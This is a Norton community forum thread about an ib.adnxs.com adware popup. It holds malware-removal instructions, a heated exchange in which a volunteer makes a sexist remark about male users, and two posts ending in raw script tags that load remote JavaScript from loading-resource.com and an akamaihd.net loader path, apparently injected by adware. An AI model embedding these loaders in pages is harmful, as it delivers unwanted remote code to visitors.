Not what you were looking for? Ask our experts!
Visitor
sgwilbert

ib.adnxs.com popup

Has anyone had a problem with the ib.adnxs.com popup.  I have ran my norton 360 premier and I tried using the norton eraser program from the website.  None of them came up with any problems.  I was wondering if there will be an update for this virus.  A lot of the websites that I use have pop up windows and I cannot have my pop up blocker set to high. 

Thanks

Bot Obliterator
Quads

Re: ib.adnxs.com popup

ANY other user other than the thread starter is not to use any instructions, scripts or proceedures,  The work though in cleaning a system is individual and only for that system due to a number of factors.

Unfortunately, with the amount of threads means the waiting time is longer, Norton continually Blocking files won't hurt your system but is is just annoying, Please wait and be patient.   I am  trying to keep up, spending hours here to script and clean machines on a first come/first served basis. If you or someone adds to your thread It will be pushed back in line due to the new update.  I use the boards in reverse to what is seen

Please do not run any tools unless instructed to do so. 

• We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability. Do as the instructions ask nothing extra or run things twice
  • If I ask a Question just answer it, don't run anything unless it states.
  • Major steps used:

1. Find

2. Break

3. Destroy

4. Cleanup  (including system as a whole)

Please read every post completely before doing anything. 

• Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

• Logs from malware removal programs (OTL is one of them) can take some time to analyze. I need you to be patient while I analyze any logs you post. Please remember, I am a volunteer, and I do have a life outside of these forum, (sometimes :smileylol:)

• Attention to detail is important! Since I cannot see or directly interact with your computer I am dependent on you to "be my eyes" and provide as much information as you can regarding the current state of your computer.

Download Adwcleaner http://general-changelog-team.fr/fr/downloads/view.download/2   The Green Arrow and run a scan (Search).  It will create a log after.

Quads

Visitor
sgwilbert

[ Edited ]

Mr. Quads

I don't care who you are or what you do.  I think that the post that you gave is demening and unnessary.  By the way you did not even answer the question that I asked in the first place.  I don't want you fixing my computer nor will I have you look at any script from my computer.  If you ask a question I will ignore you.  You need to change your post!! 

Steve

[edit: removed inappropriate content per the Participation Guidelines and Terms of Service.]

Super Contributor
cohbraz

Steve,

Quads has helped many, many people who have had some sort of infection on their computer. He is a qualified expert on virus removal, even the nasty malware items that normally would compromise a users security even after they think they have successfully removed the virus.

Quads posts this way because there are many people that he tries to help who do not read the instructions fully, or think they can take a shortcut, and screw their computer up worse than it already was. 

So, he makes all instructions very clear not because he is trying to be mean. If that were the case he would not have tried to help in the first place. Instead, he posts in this manner to try to prove his point: all of his instructions must be followed exactly as he has posted them.

Don't take his posts the wrong way. He was just trying to help.

Corey
Bot Obliterator
Quads

sgwilbert wrote:

Mr. Quads

What type of suppository do you have up your butt.  I don't care who you are or what you do.  I think that the post that you gave is demening and unnessary.  By the way you did not even answer the question that I asked in the first place.  I don't want you fixing my computer nor will I have you look at any script from my computer.  If you ask a question I will ignore you.  You need to change your post!! 

Steve

That is fine, keep your problem, cool.

my first post is the same as a lot of Malware removal people use and including the people who up keep our programs we use.  We have other connections for that.

It is hard enough removing malware over forums compared to in front of the actual system (imagine what I can do with a system in front of me, then again I do infect my system).

You can't do what I can do otherwise you would not have asked for help.  

Good Luck and have fun with your system.

Oh and I notice as with the general rule it is another male,    Females are soooo much better at being at the other end, or people who English is not their first language as they try extra hard to read and understand, (I think)

I don't want you fixing my computer nor will I have you look at any script from my computer.  If you ask a question I will ignore you.

USER wants his system as is 

For others

Quads

Bot Obliterator
Quads

People that create and update the tools we use

farbar
fireman4it
JSntgRvr
m0le
myrti
sempai
Thunder
SweetTech
Grinler
Frank

SUBS

Quads

Regular Contributor
tinfoilhat

Wow. You just cut yourself off from the best help you could possibly get ...

The other poster is right about Quads standard initial posting ... with some malware, they are extremely difficult to remove and you have to do everything in order exactly, and most people just want to charge ahead they are so frustrated ...

Best of luck to you ... it is very upsetting to get infected with malware ...

tin

Win7HP•64bit•SP1 ... N360 Premier v 20.1.1.2 (3) ... N360 Everywhere (5) ... NMS v 2.5.0.420 ... NMU v 2.0.0.232 ... Norton Snap 1.0.0.45

Visitor
donc45

I have the exact problem.  I find that the additional negative posts are distracting and not helping in fixing the problem.  Does anyone have a fix for this virus?

Thanks in advance for your help

Donc

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
ilikehoopin

I am also having the problem where I get a popup from ib.adnxs.com when I go to most sites.  I don't understand why Norton doesn't handle this for me, but I'm willing to follow your instructions.  I have downloaded the Adware Cleaner and run the search, what do I do now?

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Bot Obliterator
Quads

I am not doing any system on this thread,  the last user also did not read the warnings / instructions

Quads